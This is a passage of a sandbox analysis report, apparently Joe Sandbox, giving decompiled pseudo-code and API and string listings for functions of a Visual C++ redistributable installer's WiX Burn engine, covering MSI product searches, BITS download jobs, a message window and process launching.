                                                                          								if(lstrlenW( *_t29) == 0x40) {
                                                                          									_t47 = 0x20;
                                                                          									 *((intOrPtr*)(_t56 + 0x14)) = _t47;
                                                                          									_t44 = E000138D4(_t47, 1);
                                                                          									 *((intOrPtr*)(_t56 + 0x10)) = _t44;
                                                                          									if(_t44 != 0) {
                                                                          										_t33 =  &(_t53[2]); // 0x6c0064
                                                                          										_t57 = E0001267A(_t55,  *_t33, _t44,  *((intOrPtr*)(_t56 + 0x14)));
                                                                          										if(_t57 < 0) {
                                                                          											goto L9;
                                                                          										}
                                                                          										goto L7;
                                                                          									}
                                                                          									_t57 = 0x8007000e;
                                                                          									_push(0x8007000e);
                                                                          									_push(0x174);
                                                                          									goto L25;
                                                                          								}
                                                                          								_t44 = 0x8007000d;
                                                                          								_push(0x8007000d);
                                                                          								_push(0x16f);
                                                                          								goto L24;
                                                                          							}
                                                                          							_t58 = _t58[6];
                                                                          						}
                                                                          						goto L21;
                                                                          					}
                                                                          					_t5 =  &(_t53[1]); // 0x2e0069
                                                                          					if(CompareStringW(0x7f, 0, L"name", 0xffffffff,  *_t5, 0xffffffff) != 2) {
                                                                          						goto L5;
                                                                          					}
                                                                          					_t6 =  &(_t53[2]); // 0x6c0064
                                                                          					_t7 = _t56 + 4; // 0x5
                                                                          					_t57 = E000121A5(_t7,  *_t6, 0);
                                                                          					if(_t57 < 0) {
                                                                          						goto L9;
                                                                          					}
                                                                          					goto L5;
                                                                          				}
                                                                          				L7:
                                                                          				_t54 = _a4;
                                                                          				 *((intOrPtr*)(_t56 + 8)) =  *((intOrPtr*)(_t54 + 0x18));
                                                                          				 *((intOrPtr*)(_t56 + 0xc)) =  *((intOrPtr*)(_t54 + 0x1c));
                                                                          				_t57 = E000121A5(_t56,  *((intOrPtr*)(_t54 + 0xc)), 0);
                                                                          				if(_t57 >= 0) {
                                                                          					 *(_t56 + 0x1c) =  *(_t56 + 0x1c) & 0x00000000;
                                                                          					 *(_t56 + 4) =  *(_t56 + 4) & 0x00000000;
                                                                          				}
                                                                          				goto L9;
                                                                          			}













                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,00000000,?,00058320,00000001,?), ref: 00057E56
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,00058320,00000001,?), ref: 00057E71
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,00058320,00000001,?), ref: 00057E8C
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,00058320,00000001,?), ref: 00057EF8
                                                                          • CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,00058320,00000001,?), ref: 00057F1C
                                                                          • CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,00058320,00000001,?), ref: 00057F40
                                                                          • CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,00058320,00000001,?), ref: 00057F60
                                                                          • lstrlenW.KERNEL32(006C0064,?,00058320,00000001,?), ref: 00057F7B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareString$lstrlen
                                                                          • String ID: algorithm$apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
                                                                          • API String ID: 1657112622-2492263259
                                                                          • Opcode ID: 8f79f72134d4c4f8af6b7353efbc8856641b88a41e7f08ca86251aa0a44673d5
                                                                          • Instruction ID: 1f82e503f99144e58606aeae211e2b3f5572f549c390b86c266543c161f95fd9
                                                                          • Opcode Fuzzy Hash: 8f79f72134d4c4f8af6b7353efbc8856641b88a41e7f08ca86251aa0a44673d5
                                                                          • Instruction Fuzzy Hash: 1351F431A4C712BBEB208F04DC46F67BA61AB05732F208314FA3DAE2D1C765EC849790
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 78%
                                                                          			E0002E563(signed int _a4) {
                                                                          				int _v8;
                                                                          				void _v12;
                                                                          				struct tagMSG _v40;
                                                                          				struct _WNDCLASSW _v80;
                                                                          				int _t35;
                                                                          				intOrPtr _t37;
                                                                          				struct HWND__* _t44;
                                                                          				int _t47;
                                                                          				signed short _t57;
                                                                          				signed short _t60;
                                                                          				void** _t64;
                                                                          				signed int _t65;
                                                                          				void* _t77;
                                                                          				struct HWND__* _t79;
                                                                          
                                                                          				_t64 = _a4;
                                                                          				_t65 = 0xa;
                                                                          				_t79 = 0;
                                                                          				_t35 = memset( &_v80, 0, _t65 << 2);
                                                                          				_push(7);
                                                                          				_v12 = 0;
                                                                          				memset( &_v40, _t35, 0 << 2);
                                                                          				_t77 = _t64[2];
                                                                          				_v8 = 0;
                                                                          				_t37 =  *((intOrPtr*)(_t77 + 0x490));
                                                                          				_a4 = 0 | _t37 == 0x00000002;
                                                                          				if(_t37 != 2 || TlsSetValue( *(_t77 + 0x498),  *(_t77 + 0x4b0)) != 0) {
                                                                          					_v80.hInstance = _t64[1];
                                                                          					_v80.lpfnWndProc = E0002E705;
                                                                          					_v80.lpszClassName = L"WixBurnMessageWindow";
                                                                          					if(RegisterClassW( &_v80) != 0) {
                                                                          						_v12 = _a4;
                                                                          						_v8 = _t77 + 0xb8;
                                                                          						_t44 = CreateWindowExW(0x80, _v80.lpszClassName, _t79, 0x90000000, 0x80000000, 8, _t79, _t79, _t79, _t79, _t64[1],  &_v12);
                                                                          						if(_t44 != 0) {
                                                                          							 *(_t77 + 0x3e0) = _t44;
                                                                          							SetEvent( *_t64);
                                                                          							while(1) {
                                                                          								_t47 = GetMessageW( &_v40, _t79, _t79, _t79);
                                                                          								if(_t47 == 0) {
                                                                          									break;
                                                                          								}
                                                                          								if(_t47 == 0xffffffff) {
                                                                          									_t79 = 0x8000ffff;
                                                                          									_push("Unexpected return value from message pump.");
                                                                          									L14:
                                                                          									_push(_t79);
                                                                          									E0005012F();
                                                                          									goto L15;
                                                                          								}
                                                                          								if(IsDialogMessageW(_v40,  &_v40) == 0) {
                                                                          									TranslateMessage( &_v40);
                                                                          									DispatchMessageW( &_v40);
                                                                          								}
                                                                          							}
                                                                          							goto L15;
                                                                          						}
                                                                          						_t57 = GetLastError();
                                                                          						_t82 =  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
                                                                          						_t79 =  >=  ? 0x80004005 :  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "uithread.cpp", 0x8a, _t79);
                                                                          						_push("Failed to create window.");
                                                                          						goto L14;
                                                                          					}
                                                                          					_t60 = GetLastError();
                                                                          					_t85 =  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
                                                                          					_t79 =  >=  ? 0x80004005 :  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "uithread.cpp", 0x80, _t79);
                                                                          					_push("Failed to register window.");
                                                                          					goto L14;
                                                                          				} else {
                                                                          					_t79 = 0x8007139f;
                                                                          					L15:
                                                                          					UnregisterClassW(L"WixBurnMessageWindow", _t64[1]);
                                                                          					return _t79;
                                                                          				}
                                                                          			}


















                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                          • String ID: @Met$Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                                          • API String ID: 213125376-1135386840
                                                                          • Opcode ID: e81e2120738d6be9acacf192c2e08b6d2f47ea30bba3d6b04d49f0658ecb7ad4
                                                                          • Instruction ID: 044183950a48c36b870582ef33b5dc4b12a5019350c227e67fb9899d64324289
                                                                          • Opcode Fuzzy Hash: e81e2120738d6be9acacf192c2e08b6d2f47ea30bba3d6b04d49f0658ecb7ad4
                                                                          • Instruction Fuzzy Hash: C0417876A40364ABDB209BA5DC48ADBBFE9FF04751F104125F909EA190D735A940CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 70%
                                                                          			E00019F2B(intOrPtr* _a4, intOrPtr _a8) {
                                                                          				char _v8;
                                                                          				void* _v12;
                                                                          				char _v16;
                                                                          				intOrPtr _v24;
                                                                          				intOrPtr _v36;
                                                                          				void _v40;
                                                                          				void* _t50;
                                                                          				void* _t56;
                                                                          				void* _t58;
                                                                          				void* _t72;
                                                                          				void* _t73;
                                                                          				void* _t75;
                                                                          				void* _t91;
                                                                          				void* _t92;
                                                                          				intOrPtr _t95;
                                                                          				signed int _t97;
                                                                          				intOrPtr _t100;
                                                                          				intOrPtr _t101;
                                                                          				char* _t107;
                                                                          				void* _t108;
                                                                          				void _t109;
                                                                          				intOrPtr _t110;
                                                                          				void* _t111;
                                                                          				void* _t112;
                                                                          				void* _t113;
                                                                          
                                                                          				_t97 = 6;
                                                                          				memset( &_v40, 0, _t97 << 2);
                                                                          				_t113 = _t112 + 0xc;
                                                                          				_t99 = _a4;
                                                                          				_t95 = 0;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				_v16 = 0;
                                                                          				_t104 =  *((intOrPtr*)(_a4 + 0x10));
                                                                          				_t50 =  *((intOrPtr*)(_a4 + 0x10)) - 1;
                                                                          				if(_t50 == 0) {
                                                                          					_t107 = L"VersionString";
                                                                          					L9:
                                                                          					_t108 = E000171CF(_a8,  *((intOrPtr*)(_t99 + 0x18)),  &_v8, _t95);
                                                                          					if(_t108 >= 0) {
                                                                          						_t100 = 2;
                                                                          						_v24 = _t100;
                                                                          						if( *((intOrPtr*)(_a4 + 0x14)) != _t100) {
                                                                          							L18:
                                                                          							if(_t108 == 0x80070645) {
                                                                          								L23:
                                                                          								_push(_v8);
                                                                          								_push("Product or related product not found: %ls");
                                                                          								_t109 = 2;
                                                                          								_push(_t109);
                                                                          								E0005061A();
                                                                          								_t101 = _a4;
                                                                          								_t113 = _t113 + 0xc;
                                                                          								_t56 =  *((intOrPtr*)(_t101 + 0x10)) - 1;
                                                                          								if(_t56 == 0) {
                                                                          									L26:
                                                                          									asm("xorps xmm0, xmm0");
                                                                          									asm("movlpd [ebp-0x24], xmm0");
                                                                          									L27:
                                                                          									_v24 = 1;
                                                                          									L28:
                                                                          									_t110 = _t95;
                                                                          									L31:
                                                                          									if(_t110 >= 0) {
                                                                          										_t58 =  *((intOrPtr*)(_t101 + 0x10)) - 1;
                                                                          										if(_t58 == 0) {
                                                                          											_push(3);
                                                                          											L40:
                                                                          											_pop(_t95);
                                                                          											L41:
                                                                          											_t111 = E0002FEB7(_t104,  &_v40, _t95);
                                                                          											if(_t111 >= 0) {
                                                                          												_t111 = E00018137(_a8,  *((intOrPtr*)(_a4 + 4)),  &_v40);
                                                                          												if(_t111 >= 0) {
                                                                          													L47:
                                                                          													E00012793(_v8);
                                                                          													if(_v12 != 0) {
                                                                          														E00012647(_v12, _v16);
                                                                          													}
                                                                          													E00030499( &_v40);
                                                                          													return _t111;
                                                                          												}
                                                                          												_push("Failed to set variable.");
                                                                          												L45:
                                                                          												_push(_t111);
                                                                          												E0005012F();
                                                                          												L46:
                                                                          												_push(_t111);
                                                                          												E0005061A(2, "MsiProductSearch failed: ID \'%ls\', HRESULT 0x%x",  *_a4);
                                                                          												goto L47;
                                                                          											}
                                                                          											_push("Failed to change value type.");
                                                                          											goto L45;
                                                                          										}
                                                                          										_t72 = _t58 - 1;
                                                                          										if(_t72 == 0) {
                                                                          											_push(2);
                                                                          											goto L40;
                                                                          										}
                                                                          										_t73 = _t72 - 1;
                                                                          										if(_t73 == 0 || _t73 == 1) {
                                                                          											_t95 = 1;
                                                                          										}
                                                                          										goto L41;
                                                                          									}
                                                                          									_push("Failed to get product info.");
                                                                          									goto L45;
                                                                          								}
                                                                          								_t75 = _t56 - _t109;
                                                                          								if(_t75 == 0) {
                                                                          									_v40 = _t109;
                                                                          									_v36 = _t95;
                                                                          									goto L27;
                                                                          								}
                                                                          								if(_t75 != 1) {
                                                                          									goto L28;
                                                                          								}
                                                                          								goto L26;
                                                                          							}
                                                                          							_t110 = E00052867(_t100, _v8, _t107,  &_v40);
                                                                          							if(_t110 != 0x80070648) {
                                                                          								L22:
                                                                          								if(_t110 != 0x80070645) {
                                                                          									L30:
                                                                          									_t101 = _a4;
                                                                          									goto L31;
                                                                          								}
                                                                          								goto L23;
                                                                          							}
                                                                          							_push(_v8);
                                                                          							E0005061A(3, "Trying per-machine extended info for property \'%ls\' for product: %ls", _t107);
                                                                          							_t113 = _t113 + 0x10;
                                                                          							_t110 = E000528F8(_t100, _v8, _t95, 4, _t107,  &_v40);
                                                                          							if(_t110 != 0x80070645) {
                                                                          								goto L30;
                                                                          							}
                                                                          							_push(_v8);
                                                                          							E0005061A(2, "Trying per-user extended info for property \'%ls\' for product: %ls", _t107);
                                                                          							_t113 = _t113 + 0x10;
                                                                          							_t110 = E000528F8(_t100, _v8, _t95, 2, _t107,  &_v40);
                                                                          							goto L22;
                                                                          						}
                                                                          						_t111 = E0005255E(_t100, _t104, _v8,  &_v12,  &_v16, 1);
                                                                          						if(_t111 >= 0) {
                                                                          							if(_v16 != 1) {
                                                                          								_t108 = 0x80070645;
                                                                          								goto L18;
                                                                          							}
                                                                          							_t108 = E000122F9( &_v8,  *_v12, _t95);
                                                                          							if(_t108 >= 0) {
                                                                          								goto L18;
                                                                          							}
                                                                          							_push("Failed to copy upgrade code.");
                                                                          							goto L45;
                                                                          						}
                                                                          						_push("Failed to enumerate related products for upgrade code.");
                                                                          						goto L45;
                                                                          					}
                                                                          					_push("Failed to format GUID string.");
                                                                          					goto L45;
                                                                          				}
                                                                          				_t91 = _t50 - 1;
                                                                          				if(_t91 == 0) {
                                                                          					_t107 = L"Language";
                                                                          					goto L9;
                                                                          				}
                                                                          				_t92 = _t91 - 1;
                                                                          				if(_t92 == 0) {
                                                                          					_t107 = L"State";
                                                                          					goto L9;
                                                                          				}
                                                                          				if(_t92 == 1) {
                                                                          					_t107 = L"AssignmentType";
                                                                          					goto L9;
                                                                          				}
                                                                          				_t111 = 0x80004001;
                                                                          				E0005012F(0x80004001, "Unsupported product search type: %u", _t104);
                                                                          				_t113 = _t113 + 0xc;
                                                                          				goto L46;
                                                                          			}





























                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 00019FA3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Open@16
                                                                          • String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
                                                                          • API String ID: 3613110473-2134270738
                                                                          • Opcode ID: a9f2f54cc130f87f43e85883676feb2ee02aa46dc520acd433d3493247d67792
                                                                          • Instruction ID: 81119843353a61db2f64cb6aee613d78590bf86d2b8e056445f89b3d4531c70a
                                                                          • Opcode Fuzzy Hash: a9f2f54cc130f87f43e85883676feb2ee02aa46dc520acd433d3493247d67792
                                                                          • Instruction Fuzzy Hash: 5D61F732E41118BBCF269EA8CD45DEF7BB9EB4A311F100165F904BB251C632DF859792
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 66%
                                                                          			E0003DC0D(void* __edx, intOrPtr _a4, WCHAR** _a8, intOrPtr _a12) {
                                                                          				void* _v8;
                                                                          				WCHAR** _v12;
                                                                          				WCHAR** _v16;
                                                                          				void* __esi;
                                                                          				WCHAR** _t51;
                                                                          				WCHAR** _t53;
                                                                          				WCHAR** _t56;
                                                                          				WCHAR** _t83;
                                                                          				short _t84;
                                                                          				short _t85;
                                                                          				short _t86;
                                                                          				void* _t95;
                                                                          				WCHAR** _t97;
                                                                          				WCHAR** _t99;
                                                                          				WCHAR** _t102;
                                                                          				WCHAR** _t103;
                                                                          
                                                                          				_t95 = __edx;
                                                                          				_t96 = _a8;
                                                                          				_v8 = 0;
                                                                          				_t83 = 0;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				if(lstrlenW( *_a8) >= 8) {
                                                                          					_t99 = E000121A5( &_v8,  *_t96, 0);
                                                                          					__eflags = _t99;
                                                                          					if(_t99 >= 0) {
                                                                          						_t84 = 0x68;
                                                                          						 *_v8 = _t84;
                                                                          						_t85 = 0x74;
                                                                          						 *((short*)(_v8 + 2)) = _t85;
                                                                          						 *((short*)(_v8 + 4)) = _t85;
                                                                          						_t86 = 0x70;
                                                                          						 *((short*)(_v8 + 6)) = _t86;
                                                                          						_t51 = E0003D677(_t95,  &_v16);
                                                                          						_t97 = _v16;
                                                                          						__eflags = _t51;
                                                                          						if(_t51 >= 0) {
                                                                          							_t53 = E0003DAC1(_t97, _a8[1], _a8[2]);
                                                                          							__eflags = _t53;
                                                                          							if(_t53 >= 0) {
                                                                          								_t102 = ( *_t97)[8](_t97, _v8, _a12);
                                                                          								_a8 = _t102;
                                                                          								__eflags = _t102;
                                                                          								if(__eflags >= 0) {
                                                                          									_t56 = E0003E0B4(_t86, _t95, __eflags, 0x30);
                                                                          									__eflags = _t56;
                                                                          									if(_t56 == 0) {
                                                                          										_t83 = 0;
                                                                          										__eflags = 0;
                                                                          									} else {
                                                                          										_t56 = E0003D5AF(_t56, _a4,  &_a8);
                                                                          										_t102 = _a8;
                                                                          										_t83 = _t56;
                                                                          									}
                                                                          									__eflags = _t83;
                                                                          									if(_t83 != 0) {
                                                                          										__eflags = _t102;
                                                                          										if(_t102 >= 0) {
                                                                          											_t103 = ( *_t97)[0x32](_t97, _t83);
                                                                          											__eflags = _t103;
                                                                          											if(_t103 >= 0) {
                                                                          												while(1) {
                                                                          													_v12 = 0;
                                                                          													_t83[9] = 0;
                                                                          													_t83[8] = 0;
                                                                          													ResetEvent(_t83[0xa]);
                                                                          													_t103 = ( *_t97)[0xe](_t97);
                                                                          													__eflags = _t103;
                                                                          													if(_t103 < 0) {
                                                                          														break;
                                                                          													}
                                                                          													_t90 = _t83;
                                                                          													_t103 = E0003DB67(_t83, _t97);
                                                                          													__eflags = _t103;
                                                                          													if(_t103 < 0) {
                                                                          														_push("Failed while waiting for BITS download.");
                                                                          														goto L31;
                                                                          													}
                                                                          													_t103 = _t83[9];
                                                                          													__eflags = _t103 - 0x80070642;
                                                                          													if(_t103 == 0x80070642) {
                                                                          														goto L32;
                                                                          													}
                                                                          													__eflags = _t103;
                                                                          													if(_t103 < 0) {
                                                                          														E0003D955(_t90, _t103, _a4, _t97, _t103, _t83[8],  &_v12);
                                                                          													}
                                                                          													__eflags = _v12;
                                                                          													if(_v12 != 0) {
                                                                          														continue;
                                                                          													} else {
                                                                          														__eflags = _t103;
                                                                          														if(_t103 >= 0) {
                                                                          															_t103 = ( *_t97)[0x12](_t97);
                                                                          															__eflags = _t103;
                                                                          															if(_t103 >= 0) {
                                                                          																goto L32;
                                                                          															}
                                                                          															_push("Failed to complete BITS job.");
                                                                          															goto L31;
                                                                          														}
                                                                          														_push("Failed to download BITS job.");
                                                                          														goto L31;
                                                                          													}
                                                                          												}
                                                                          												_push("Falied to start BITS job.");
                                                                          												goto L31;
                                                                          											}
                                                                          											_push("Failed to set callback interface for BITS job.");
                                                                          											goto L31;
                                                                          										}
                                                                          										_push("Failed to initialize BITS job callback.");
                                                                          										goto L31;
                                                                          									} else {
                                                                          										_t103 = 0x8007000e;
                                                                          										E000137D3(_t56, "bitsengine.cpp", 0x163, 0x8007000e);
                                                                          										_push("Failed to create BITS job callback.");
                                                                          										L31:
                                                                          										_push(_t103);
                                                                          										E0005012F();
                                                                          										L32:
                                                                          										__eflags = _t97;
                                                                          										if(_t97 != 0) {
                                                                          											( *_t97)[0x32](_t97, 0);
                                                                          											__eflags = _t103;
                                                                          											if(_t103 < 0) {
                                                                          												( *_t97)[0x10](_t97);
                                                                          											}
                                                                          										}
                                                                          										__eflags = _t83;
                                                                          										if(_t83 != 0) {
                                                                          											( *_t83)[4](_t83);
                                                                          										}
                                                                          										__eflags = _t97;
                                                                          										if(_t97 != 0) {
                                                                          											( *_t97)[4](_t97);
                                                                          										}
                                                                          										goto L39;
                                                                          									}
                                                                          								}
                                                                          								_push("Failed to add file to BITS job.");
                                                                          								goto L31;
                                                                          							}
                                                                          							_push("Failed to set credentials for BITS job.");
                                                                          							goto L31;
                                                                          						}
                                                                          						_push("Failed to create BITS job.");
                                                                          						goto L31;
                                                                          					}
                                                                          					_push("Failed to copy download URL.");
                                                                          					_push(_t99);
                                                                          					E0005012F();
                                                                          					goto L39;
                                                                          				} else {
                                                                          					_t103 = 0x80070057;
                                                                          					E000137D3(_t43, "bitsengine.cpp", 0x14b, 0x80070057);
                                                                          					E0005012F(0x80070057, "Invalid BITS engine URL: %ls",  *_t96);
                                                                          					L39:
                                                                          					if(_v8 != 0) {
                                                                          						E000554EF(_v8);
                                                                          					}
                                                                          					return _t103;
                                                                          				}
                                                                          			}




















                                                                          APIs
                                                                          • lstrlenW.KERNEL32(?,?,00039751,75C08550,?,?,00000000,?,?,?,00000001,00000000,?), ref: 0003DC28
                                                                          Strings
                                                                          • Failed to set callback interface for BITS job., xrefs: 0003DD60
                                                                          • Failed to complete BITS job., xrefs: 0003DDD2
                                                                          • Failed to set credentials for BITS job., xrefs: 0003DCD6
                                                                          • Failed while waiting for BITS download., xrefs: 0003DDD9
                                                                          • Failed to create BITS job callback., xrefs: 0003DD3B
                                                                          • Failed to download BITS job., xrefs: 0003DDBF
                                                                          • bitsuser.cpp, xrefs: 0003DC3E, 0003DD31
                                                                          • Failed to create BITS job., xrefs: 0003DCB7
                                                                          • Failed to add file to BITS job., xrefs: 0003DCF5
                                                                          • Falied to start BITS job., xrefs: 0003DDE0
                                                                          • Failed to copy download URL., xrefs: 0003DC6F
                                                                          • Failed to initialize BITS job callback., xrefs: 0003DD49
                                                                          • Invalid BITS user URL: %ls, xrefs: 0003DC4A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen
                                                                          • String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS user URL: %ls$bitsuser.cpp
                                                                          • API String ID: 1659193697-2382896028
                                                                          • Opcode ID: e2f74afbce87c731f31e105ec4d4e5dff06767b1ebe5a64b0783dfe1fafca27a
                                                                          • Instruction ID: 404ba2b2ebc180dbe6746d98c7ca3fbfead71e850ab253e7f2c520416e101602
                                                                          • Opcode Fuzzy Hash: e2f74afbce87c731f31e105ec4d4e5dff06767b1ebe5a64b0783dfe1fafca27a
                                                                          • Instruction Fuzzy Hash: 95619131E00225EBCB239F94E885EAE7BB8AF04B50F118256FD08AF251E775DD00DB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 73%
                                                                          			E0001BB30(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                          				struct _SECURITY_ATTRIBUTES* _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				struct _SECURITY_ATTRIBUTES* _v20;
                                                                          				char _v24;
                                                                          				struct _PROCESS_INFORMATION _v40;
                                                                          				struct _STARTUPINFOW _v108;
                                                                          				void* __edi;
                                                                          				intOrPtr* _t60;
                                                                          				void* _t73;
                                                                          				signed short _t82;
                                                                          				void* _t98;
                                                                          				intOrPtr _t100;
                                                                          				void* _t102;
                                                                          
                                                                          				_v24 = 0;
                                                                          				_v16 = 0;
                                                                          				_v20 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				E0003F670(_t98,  &_v108, 0, 0x44);
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_t100 = _a8;
                                                                          				_t60 =  *((intOrPtr*)(_t100 + 0xc));
                                                                          				if(_t60 == 0 ||  *_t60 == 0) {
                                                                          					_t102 = E00011F20( &_v20, L"\"%ls\"",  *(_t100 + 8));
                                                                          					if(_t102 < 0) {
                                                                          						goto L6;
                                                                          					}
                                                                          					_t73 = E00011F20( &_v12, L"\"%ls\"",  *(_t100 + 8));
                                                                          					goto L12;
                                                                          				} else {
                                                                          					_t94 =  &_v24;
                                                                          					_t102 = E000171CF(_a4, _t60,  &_v24, 0);
                                                                          					if(_t102 >= 0) {
                                                                          						_push(_v24);
                                                                          						_t102 = E00011F62( &_v20, L"\"%ls\" %s",  *(_t100 + 8));
                                                                          						if(_t102 >= 0) {
                                                                          							_t102 = E000171E9(_a4,  *((intOrPtr*)(_t100 + 0xc)),  &_v16, 0);
                                                                          							if(_t102 >= 0) {
                                                                          								_push(_v16);
                                                                          								_t73 = E00011F20( &_v12, L"\"%ls\" %s",  *(_t100 + 8));
                                                                          								L12:
                                                                          								_t102 = _t73;
                                                                          								if(_t102 >= 0) {
                                                                          									_t102 = E00013446(_t94,  *(_t100 + 8),  &_v8);
                                                                          									if(_t102 < 0 && _v8 != 0) {
                                                                          										E000554EF(_v8);
                                                                          										_v8 = 0;
                                                                          									}
                                                                          									_push(_v12);
                                                                          									E0001550F(2, 0x2000025a,  *(_t100 + 8));
                                                                          									_v108.cb = 0x44;
                                                                          									if(CreateProcessW( *(_t100 + 8), _v20, 0, 0, 0, 0x200, 0, _v8,  &_v108,  &_v40) != 0) {
                                                                          										 *_a12 = _v40.dwProcessId;
                                                                          										if( *(_t100 + 0x10) != 0) {
                                                                          											WaitForInputIdle(_v40.hProcess,  *(_t100 + 0x10));
                                                                          										}
                                                                          									} else {
                                                                          										_t82 = GetLastError();
                                                                          										_t105 =  <=  ? _t82 : _t82 & 0x0000ffff | 0x80070000;
                                                                          										_t102 =  >=  ? 0x80004005 :  <=  ? _t82 : _t82 & 0x0000ffff | 0x80070000;
                                                                          										E000137D3(0x80004005, "approvedexe.cpp", 0xbe, _t102);
                                                                          										E0005012F(_t102, "Failed to CreateProcess on path: %ls",  *(_t100 + 8));
                                                                          									}
                                                                          									goto L21;
                                                                          								}
                                                                          								_push("Failed to create obfuscated executable command.");
                                                                          								goto L4;
                                                                          							}
                                                                          							_push("Failed to format obfuscated argument string.");
                                                                          							goto L4;
                                                                          						}
                                                                          						L6:
                                                                          						_push("Failed to create executable command.");
                                                                          						goto L4;
                                                                          					} else {
                                                                          						_push("Failed to format argument string.");
                                                                          						L4:
                                                                          						_push(_t102);
                                                                          						E0005012F();
                                                                          						L21:
                                                                          						E00012793(_v24);
                                                                          						if(_v16 != 0) {
                                                                          							E000554EF(_v16);
                                                                          						}
                                                                          						E00012793(_v20);
                                                                          						if(_v12 != 0) {
                                                                          							E000554EF(_v12);
                                                                          						}
                                                                          						if(_v8 != 0) {
                                                                          							E000554EF(_v8);
                                                                          						}
